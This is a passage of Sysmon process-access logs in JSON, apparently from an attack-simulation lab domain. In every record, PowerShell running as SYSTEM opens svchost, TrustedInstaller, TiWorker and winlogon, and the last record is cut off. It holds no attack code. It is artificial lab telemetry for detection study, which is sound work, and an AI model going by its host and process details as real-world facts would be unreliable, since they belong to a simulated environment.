{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1119,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00101EC40000}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00101EC40000}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1120,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001031CF0000}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001031CF0000}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1121,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1122,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010C5EF0000}\r\nTargetProcessId: 1568\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010C5EF0000}","TargetProcessId":"1568","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1123,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010D6020100}\r\nTargetProcessId: 1808\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010D6020100}","TargetProcessId":"1808","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1124,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00103D7A0100}\r\nTargetProcessId: 2372\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00103D7A0100}","TargetProcessId":"2372","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1125,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-0010C4650200}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-0010C4650200}","TargetProcessId":"3052","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1126,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-00100B640200}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:05.381","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","SourceProcessId":"2116","SourceThreadId":"2852","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-00100B640200}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44C33F41)","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1127,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:05.381\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nSourceProcessId: 2116\r\nSourceThreadId: 2852\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-0010214A0000}\r\nTargetProcessId: 780\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: 